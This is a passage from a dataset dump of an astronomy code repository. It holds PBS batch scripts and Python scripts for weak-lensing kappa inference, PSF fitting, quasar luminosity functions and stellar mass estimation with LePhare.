GGL_los_8_0_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_3_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_7_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\n" }, { "alpha_fraction": 0.6582568883895874, "alphanum_fraction": 0.7912843823432922, "avg_line_length": 42.650001525878906, "blob_id": "03866717793c51688d500ff5095a61ec4fa64526", "content_id": "896dbac9c19567dbb835b0b0ebe150c2b2bae095", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 872, "license_type": "no_license", "max_line_length": 164, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim3new.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n##PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Log3.out\n#PBS -e Log3.err\n#PBS -N 3\n#PBS -l mem=30gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython inferkappa_unbiasedwithshear45and120FITSioincrem4.py J1206 -1.0 -1.0 nohandpicked fiducial notempty 5 23 measured med 120_gal 120_oneoverr 45_gal 45_oneoverr\npython inferkappa_unbiasedwithshear45and120FITSioincrem4.py J1206 -1.0 -1.0 nohandpicked fiducial notempty 5 23 measured med 120_gal 120_zoverr 45_gal 45_zoverr\npython inferkappa_unbiasedwithshear45and120FITSioincrem4.py J1206 -1.0 -1.0 nohandpicked fiducial notempty 5 24 measured 
med 120_gal 120_oneoverr 45_gal 45_oneoverr\npython inferkappa_unbiasedwithshear45and120FITSioincrem4.py J1206 -1.0 -1.0 nohandpicked fiducial notempty 5 24 measured med 120_gal 120_zoverr 45_gal 45_zoverr" }, { "alpha_fraction": 0.5442214012145996, "alphanum_fraction": 0.6121577620506287, "avg_line_length": 43.49180221557617, "blob_id": "da5e604032e20fa916ec0a34108b5eae0f30aefa", "content_id": "4160d455611d145695fcb63a9adb22fbdab00b07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2714, "license_type": "no_license", "max_line_length": 353, "num_lines": 61, "path": "/python/modeling_utilities/iterateChihFan_4psf.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# I first copy r_nolens_out_psf.fits into rnolenspsfcorrect.fits. Then I edit config_4psfrnolens to contain the correct input names, and this code to read the correct lines. After that I modify r_nolens_out_file.input to use rnolenspsfcorrect.fits as psf, read sigmar.fits, disallow analytical PSF parameters (except for sky) and run the code as follows:\n# run as python iterateChihFan_4psf.py r_nolens_out_file.input config_4psfrnolens rnolenspsfcorrect.fits\n\nimport sys\nimport os \nimport numpy as np\nfrom astropy.io import fits\n\niterations = 3\npixscale = 0.256\n\nfor i in range(iterations):\n with open(sys.argv[1], 'r') as fileinput:\n hostlens = fileinput.readlines()\n\n x1 = float(hostlens[43-1].split()[1]) # brightest\n y1 = float(hostlens[44-1].split()[1])\n f1 = float(hostlens[50-1].split()[1])\n x2 = float(hostlens[54-1].split()[1]) # 2nd brightest\n y2 = float(hostlens[55-1].split()[1])\n f2 = float(hostlens[61-1].split()[1])\n x3 = float(hostlens[65-1].split()[1]) # 3rd brightest\n y3 = float(hostlens[66-1].split()[1])\n f3 = float(hostlens[72-1].split()[1])\n x4 = float(hostlens[76-1].split()[1]) # 4th brightest\n y4 = float(hostlens[77-1].split()[1])\n f4 = float(hostlens[83-1].split()[1])\n\n image = fits.open(str(sys.argv[1])[:-10]+\"psf.fits\")\n data = image[0].data * f2\n imagex = image\n imagex[0].data = data\n imagex.writeto(str(sys.argv[1])[:-10]+\"psf.fits\",clobber=True)\n\n with open(sys.argv[2], 'r') as fileconfig:\n config = fileconfig.readlines()\n\n config[6] = \"x1_in_arcsec \" + \"%.6f\" % (x1 * pixscale) + \"\\n\"\n config[7] = \"y1_in_arcsec \" + \"%.6f\" % (y1 * pixscale) + \"\\n\"\n config[8] = \"intensityof1(weak) \" + \"%.6e\" % f1 + \"\\n\"\n config[9] = \"x2_in_arcsec \" + \"%.6f\" % (x2 * pixscale) + \"\\n\"\n config[10] = \"y2_in_arcsec \" + \"%.6f\" % (y2 * pixscale) + \"\\n\"\n config[11] = \"intensityof2(strong) \" + \"%.6e\" % f2 + \"\\n\"\n config[12] = \"x3_in_arcsec \" + \"%.6f\" % (x3 * pixscale) + \"\\n\"\n config[13] = \"y3_in_arcsec \" + \"%.6f\" % (y3 * pixscale) + \"\\n\"\n config[14] = \"intensityof3(weak) \" + \"%.6e\" % f3 + \"\\n\"\n config[15] = \"x4_in_arcsec \" + \"%.6f\" % (x4 * pixscale) + \"\\n\"\n config[16] = \"y4_in_arcsec \" + \"%.6f\" % (y4 * pixscale) + \"\\n\"\n config[17] = \"intensityof4(weak) \" + \"%.6e\" % f4 + \"\\n\"\n\n with open(sys.argv[2], 'w') as fileconfig:\n fileconfig.writelines(config)\n\n fileinput.close()\n fileconfig.close()\n\n os.system(\"python PSF_correction_4psf.py %s %s\" %(str(sys.argv[2]),str(sys.argv[3])))\n os.system(\"hostlens %s\" % str(sys.argv[1]))\n\nfor i in range(3):\n os.system(\"hostlens %s\" % str(sys.argv[1])) # because hostlens needs a few executions in order to fully converge\n" }, { "alpha_fraction": 0.5504754781723022, 
"alphanum_fraction": 0.6386247277259827, "avg_line_length": 43.819671630859375, "blob_id": "2a87086df3f95ddebfe36effb68ffb34c596374f", "content_id": "fb63785e27cfbf10d73fe4ab28ffc43720a45b69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2734, "license_type": "no_license", "max_line_length": 427, "num_lines": 61, "path": "/python/QSOlumfunc/QSOlumfunc.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code uses the QSO luminosity function from Croom et al. 2009 (SDSS + 2dF), as referenced in Oguri et al. 2012 (AJ,143:120) to compute a redshift probability for a quasar of given observed magnitude. I made sure that those papers use AB. However, I am not completely satisfied because the code also needs to use mag2mag.py with the AGN template from ............to convert from observed magnitude: M_i(z=0)=m_i-DM(z)-K'(z)\n# The luminosity function is given in terms of rest-frame g-band absolute magnitudes at z = 2 (i.e., M_g = M_g(z = 2)).\n\nimport numpy as np\nimport os\n\n# observed, magnification corrected QSO magnitudes:\nqso_g = 18.92\nqso_r = 18.80\nqso_i = 18.66\nqso_z = 18.53\nqso_y = 18.24\n\nKcorr = np.loadtxt(\"datafile4.txt\",unpack=True) # K-correction from Richards et al. 2006\nzlist = Kcorr[0] # the list of redshifts z = np.linspace(0,5.49,550)\n\nh=0.7 # Hubble\nalpha =-0.5\nbeta_h=3.33\nbeta_1=1.42\nPhi_star=1.45*(10**-6)*((h/0.7)**3) # Mpc^-3 mag-1, h=0.7\nM_g_star_zero=-22.18 + 5*np.log10(h/0.7)\nk_1=1.44\nk_2=-0.315\nM_g_star = lambda z : M_g_star_zero-2.5*(k_1*z+k_2*(z**2))\nPhi = lambda M_g,z: Phi_star/(10**(0.4*(1-beta_h)*(M_g-M_g_star(z)))+10**(0.4*(1-beta_1)*(M_g-M_g_star(z))))\n\nimport distances\nd = distances.Distance()\nDM = lambda z: d.distance_modulus(z)\n\nPhi_list = np.zeros(len(zlist))\nfor z in range(len(zlist)):\n if z != 0: # error in distance_modulus\n M_i_z0 = qso_i - DM(zlist[z]) + 2.5*(1+alpha)*np.log10(1+zlist[z]) # absolute magnitude at redshift zero assuming a quasar continuum (formula 1 in Richards et al. 
2006, and m=M+DM+K)\n M_i_z = M_i_z0 - 2.5*(1+alpha)*np.log10(1+zlist[z])\n M_g = M_i_z + 0.255 - Kcorr[1][z] # for each redshift, find M_g(z=2) which corresponds to m_i and apply the K-correction computed for M_i(z=2)\n #mag2mag = float(os.popen(\"mag2mag.py -T agn -m1 %s -f1 i_ps1 -z1 %s -f2 i_SDSS -z2 0.00\" %(qso_i,zlist[z])).read())\n #M_g = mag2mag + 2.5*(1+alpha)*np.log10(1+zlist[z]) + 0.255 - Kcorr[1][z]\n Phi_list[z] = Phi(M_g,zlist[z])\n\n#Phi_list = np.zeros(len(zlist))\n#for z in range(len(zlist)):\n# Phi_list[z] = Phi(-28,zlist[z])\n\nnp.savetxt(\"QLF(z)_iobserved.cat\",np.c_[zlist,Phi_list])\n\nimport pylab as plt\nplt.clf()\nplt.xlim([0.4,3])\nPhi_list[40:300] = Phi_list[40:300]/np.sum(Phi_list[40:300])\nplt.plot(zlist[40:300],Phi_list[40:300])\nplt.show()\n\n\n\n#import os\n#\"mag2mag.py -T agn -m1 18.66 -f1 i_ps1 -z1 2.00 -f2 g_SDSS -z2 0.00\"\n#mag2mag=float(os.popen(\"mag2mag.py -T agn -m1 18.66 -f1 i_ps1 -z1 2.00 -f2 g_SDSS -z2 0.00\").read()) # redirect standard output to variable\n# Phi(M_g,z) = Phi_star/(10**(0.4*(1-beta_h)*(M_g-M_g_star(z)))+10**(0.4*(1-beta_1)*(M_g-M_g_star(z))))\n# M_g_star(z) = M_g_star_zero-2.5*(k_1*z+k_2*(z**2))\n" }, { "alpha_fraction": 0.6620000004768372, "alphanum_fraction": 0.7620000243186951, "avg_line_length": 24, "blob_id": "7acde4dffb0d9b4834cd13456c1d973d758ef403", "content_id": "5635146e43b75d85bb92f9ccbdff334053e31cc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 500, "license_type": "no_license", "max_line_length": 66, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim2.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log2s.out\n#PBS -e Log2s.err\n#PBS -N 2s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal oneoverr\npython inferkappasimbias.py WFI2033 5 120 23 meds gal oneoverr\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal oneoverr\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal oneoverr\n" }, { "alpha_fraction": 0.6278772354125977, "alphanum_fraction": 0.6930946111679077, "avg_line_length": 25.066667556762695, "blob_id": "b9a08b8a008d72a48b79bf8408637765d21e876f", "content_id": "35da81b00eec22167dffa102174581e573b14de6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 782, "license_type": "no_license", "max_line_length": 97, "num_lines": 30, "path": "/python/catalogue_utilities/Mstar-veldispcomparison.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Cone search\nimport numpy as np\nimport pylab as plt\n\n# section 3, Jabran Zahid et al. 2016\nlogsigmab = 2.072\nlogMb = 10.26\nalpha1 = 0.403\nalpha2 = 0.29\n\ndef log_sigma_Zahid(logMstar):\n log_sigma_Zahid = np.copy(logMstar)\n log_sigma_Zahid[logMstar <= logMb] = logsigmab + alpha1*(logMstar[logMstar <= logMb] - logMb)\n log_sigma_Zahid[logMstar > logMb] = logsigmab + alpha2*(logMstar[logMstar > logMb] - logMb)\n return log_sigma_Zahid\n\nlogMstar = np.linspace(9,12,100)\n\n# bottom of left column, page 5, Mason et al. 
2015\np = 0.24\nq = 2.34\nlog_sigma_Mason = p * logMstar - 11 * p + q\n\n\nplt.plot(logMstar,log_sigma_Mason,label=\"Mason 2015\")\nplt.plot(logMstar,log_sigma_Zahid(logMstar),label=\"Zahid 2016\")\nplt.xlabel('log(Mstar)')\nplt.ylabel('log(sigma)')\nplt.legend()\nplt.show()\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 62.727272033691406, "blob_id": "3520e0324854729b36ed3a144178a374d0f30037", "content_id": "2f42c65b6ba9c8c39fcee7bd0f4aa2dba7bbce7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch5_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1\n#PBS -o Logb5.out\n#PBS -e Logb5.err\n#PBS -N 5\n#PBS -l mem=11gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_3_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_7_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\n" }, { "alpha_fraction": 0.5450419783592224, "alphanum_fraction": 0.5695611238479614, "avg_line_length": 70.66990661621094, "blob_id": "0bf786308d5891b2b6e19961329db753acf21c38", "content_id": "8e6bc214c2c5e990718f5ee6ab6e7c832f09414f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14764, "license_type": "no_license", "max_line_length": 404, "num_lines": 206, "path": "/python/catalogue_utilities/MstarMillenium.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 
171 1deg^2 throughout W1-4\n# run from the lephare_dev/test folder as: python /Users/perseus/Dropbox/Davis_work/code/MstarMillenium.py /Volumes/G-RAIDStudio/simulations/lensing_simulations/Guo_galaxies/GGL_los_8_7_7_0_0_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63.pdz number\n# where number should be different for different processes run in the same time\n\nimport numpy as np\nimport scipy\nimport sys\nimport os\nfrom os import system\nfrom scipy import special\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.io import ascii\nfrom astropy.table import Table, Column\nimport time\n\nstart_timefield = time.time()\n\nlepharenr=500 # how many objects should lephare be run with\nu_millenium=np.zeros(lepharenr)\nuerr_millenium=np.zeros(lepharenr)\ng_millenium=np.zeros(lepharenr)\ngerr_millenium=np.zeros(lepharenr)\nr_millenium=np.zeros(lepharenr)\nrerr_millenium=np.zeros(lepharenr)\ni_millenium=np.zeros(lepharenr)\nierr_millenium=np.zeros(lepharenr)\nz_millenium=np.zeros(lepharenr)\nzerr_millenium=np.zeros(lepharenr)\nJ_millenium=np.zeros(lepharenr)\nJerr_millenium=np.zeros(lepharenr)\nH_millenium=np.zeros(lepharenr)\nHerr_millenium=np.zeros(lepharenr)\nKs_millenium=np.zeros(lepharenr)\nKserr_millenium=np.zeros(lepharenr)\nzbest=np.zeros(lepharenr)\nzspec=np.zeros(lepharenr)\npofz=np.zeros((lepharenr,70))\nmass_best=np.zeros((lepharenr,72)) #because I also compute for z_best,z_spec\nmass_inf=np.zeros((lepharenr,72))\nmass_med=np.zeros((lepharenr,72))\nmass_sup=np.zeros((lepharenr,72))\nz=np.linspace(0.05,3.5,70)\nos.system(\"rm %s_mstar_noJHKs.cat\" % str(sys.argv[1])[0:len(str(sys.argv[1]))-4]) # since the code only appends, if we have an incomplete previous output we should remove it\nos.system(\"rm %s_mstar_withJHKs.cat\" % str(sys.argv[1])[0:len(str(sys.argv[1]))-4])\nitrue=0\nindex=0\nname=[]\nwith open(str(sys.argv[1])) as fields:\n for gal in fields:\n index=index+1\n if gal!=\"\\n\": # careful to include this, otherwise the objects at the end of file fail to be included\n if itrue==lepharenr:\n name_in=\"/Users/perseus/lephare_dev/test/millenium_%s.cat\" % str(sys.argv[2])\n name_out=\"/Users/perseus/lephare_dev/test/millenium_%s.cat.MAG_BC03_I09.lephareout\" % str(sys.argv[2])\n for i in range(1): #with and without JHKs\n lephare_in = open(name_in,'w')\n lephare_in.write(\"# \\t ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t J \\t J_err \\t H \\t H_err \\t Ks \\t Ks_err \\t context \\t z-spec \\t string \\n\")\n list=[]\n for k in range(lepharenr): #create list of lists\n list.append([])\n for k in range(lepharenr):\n if i==0: #for zbest\n lephare_in.write('1 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 31 %s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zbest[k]))\n if i==1:\n lephare_in.write('1 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 255 %s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zbest[k]))\n if i==0: #for zspec\n lephare_in.write('2 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 31 
%s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zspec[k]))\n if i==1:\n lephare_in.write('2 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 255 %s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zspec[k]))\n for j in range(70):\n if pofz[k][j]>0.001:\n list[k].append(j)\n if i==0:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 31 %s\\n' % (len(list[k])+2,u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],z[j]))\n if i==1:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 255 %s\\n' % (len(list[k])+2,u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],z[j]))\n lephare_in.close()\n os.system(\"/Users/perseus/lephare_dev/test/runlephare_phys_para_millenium.sh %s\" % name_in)\n l=0\n with open('%s' % name_out) as lephare_out:\n lineout=lephare_out.readlines()\n for k in range(lepharenr):\n mass_best[k][0]=float(lineout[62+l].split()[33]) # these first 2 are for zbest and zspec\n mass_inf[k][0]=float(lineout[62+l].split()[34])\n mass_med[k][0]=float(lineout[62+l].split()[35])\n mass_sup[k][0]=float(lineout[62+l].split()[36])\n mass_best[k][1]=float(lineout[63+l].split()[33])\n mass_inf[k][1]=float(lineout[63+l].split()[34])\n mass_med[k][1]=float(lineout[63+l].split()[35])\n mass_sup[k][1]=float(lineout[63+l].split()[36])\n l=l+2\n for j in range(len(list[k])):\n mass_best[k][list[k][j]+2]=float(lineout[62+l].split()[33])\n mass_inf[k][list[k][j]+2]=float(lineout[62+l].split()[34])\n mass_med[k][list[k][j]+2]=float(lineout[62+l].split()[35])\n mass_sup[k][list[k][j]+2]=float(lineout[62+l].split()[36])\n l=l+1\n if i==0:\n outfile=open('%s_mstar_noJHKs.cat' % str(sys.argv[1])[0:len(str(sys.argv[1]))-4],'a')\n if i==1:\n outfile=open('%s_mstar_withJHKs.cat' % str(sys.argv[1])[0:len(str(sys.argv[1]))-4],'a')\n output=\"\"\n for k in range(lepharenr):\n output=output+name[k]+\"\\t\"+str(mass_best[k][0])+\"\\t\"+str(mass_inf[k][0])+\"\\t\"+str(mass_med[k][0])+\"\\t\"+str(mass_sup[k][0])+\"\\t\"+str(mass_best[k][1])+\"\\t\"+str(mass_inf[k][1])+\"\\t\"+str(mass_med[k][1])+\"\\t\"+str(mass_sup[k][1])+\"\\t\"\n for j in range(70):\n output=output+str(mass_best[k][j+2])+\"\\t\"+str(mass_inf[k][j+2])+\"\\t\"+str(mass_med[k][j+2])+\"\\t\"+str(mass_sup[k][j+2])+\"\\t\"\n output=output+\"\\n\"\n outfile.write(output)\n outfile.close()\n name=[]\n itrue=0\n mass_best=np.zeros((lepharenr,72))\n mass_inf=np.zeros((lepharenr,72))\n mass_med=np.zeros((lepharenr,72))\n mass_sup=np.zeros((lepharenr,72))\n print \"------ running object number: \\t\", index, \"------\"\n name.append(gal.split()[0])\n u_millenium[itrue]=float(gal.split()[6])\n uerr_millenium[itrue]=float(gal.split()[7])\n 
g_millenium[itrue]=float(gal.split()[8])\n gerr_millenium[itrue]=float(gal.split()[9])\n r_millenium[itrue]=float(gal.split()[10])\n rerr_millenium[itrue]=float(gal.split()[11])\n i_millenium[itrue]=float(gal.split()[12])\n ierr_millenium[itrue]=float(gal.split()[13])\n z_millenium[itrue]=float(gal.split()[14])\n zerr_millenium[itrue]=float(gal.split()[15])\n J_millenium[itrue]=float(gal.split()[16])\n Jerr_millenium[itrue]=float(gal.split()[17])\n H_millenium[itrue]=float(gal.split()[18])\n Herr_millenium[itrue]=float(gal.split()[19])\n Ks_millenium[itrue]=float(gal.split()[20])\n Kserr_millenium[itrue]=float(gal.split()[21])\n zbest[itrue]=float(gal.split()[3])\n zspec[itrue]=float(gal.split()[2])\n for j in range(70): # I MODIFIED FROM 69, BUT NEED TO CHECK IF CORRECT\n #print linepdz[i].split()[j+2], \"\\n\"\n #print [x[0:len(linepdz[i].split()[j+2])-1] for x in linepdz[i].split()[j+2]], \"\\n\"\n pofz[itrue][j]=float(str(gal.split()[j+22]))\n itrue=itrue+1\n #the code below is necessary to deal with the objects at the end of the file, if there are less than lepharenr objects left\nname_in=\"/Users/perseus/lephare_dev/test/millenium_%s.cat\" % str(sys.argv[2])\nname_out=\"/Users/perseus/lephare_dev/test/millenium_%s.cat.MAG_BC03_I09.lephareout\" % str(sys.argv[2])\nfor i in range(1):\n lephare_in = open(name_in,'w')\n lephare_in.write(\"# \\t ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t J \\t J_err \\t H \\t H_err \\t Ks \\t Ks_err \\t context \\t z-spec \\t string \\n\")\n list=[]\n for k in range(itrue): #create list of lists\n list.append([])\n for k in range(itrue):\n if i==0: #for zbest\n lephare_in.write('1 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 31 %s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zbest[k]))\n if i==1:\n lephare_in.write('1 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 255 %s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zbest[k]))\n if i==0: #for zspec\n lephare_in.write('2 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 31 %s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zspec[k]))\n if i==1:\n lephare_in.write('2 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 255 %s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zspec[k]))\n for j in range(70):\n if pofz[k][j]>0.001:\n list[k].append(j)\n if i==0:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 31 %s\\n' % 
(len(list[k])+2,u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],z[j]))\n if i==1:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 255 %s\\n' % (len(list[k])+2,u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],z[j]))\n lephare_in.close()\n os.system(\"/Users/perseus/lephare_dev/test/runlephare_phys_para_millenium.sh %s\" % name_in)\n l=0\n with open('%s' % name_out) as lephare_out:\n lineout=lephare_out.readlines()\n for k in range(itrue):\n mass_best[k][0]=float(lineout[62+l].split()[33])\n mass_inf[k][0]=float(lineout[62+l].split()[34])\n mass_med[k][0]=float(lineout[62+l].split()[35])\n mass_sup[k][0]=float(lineout[62+l].split()[36])\n mass_best[k][1]=float(lineout[63+l].split()[33])\n mass_inf[k][1]=float(lineout[63+l].split()[34])\n mass_med[k][1]=float(lineout[63+l].split()[35])\n mass_sup[k][1]=float(lineout[63+l].split()[36])\n l=l+2\n for j in range(len(list[k])):\n mass_best[k][list[k][j]+2]=float(lineout[62+l].split()[33])\n mass_inf[k][list[k][j]+2]=float(lineout[62+l].split()[34])\n mass_med[k][list[k][j]+2]=float(lineout[62+l].split()[35])\n mass_sup[k][list[k][j]+2]=float(lineout[62+l].split()[36])\n l=l+1\n if i==0:\n outfile=open('%s_mstar_noJHKs.cat' % str(sys.argv[1])[0:len(str(sys.argv[1]))-4],'a')\n if i==1:\n outfile=open('%s_mstar_withJHKs.cat' % str(sys.argv[1])[0:len(str(sys.argv[1]))-4],'a')\n output=\"\"\n for k in range(itrue):\n 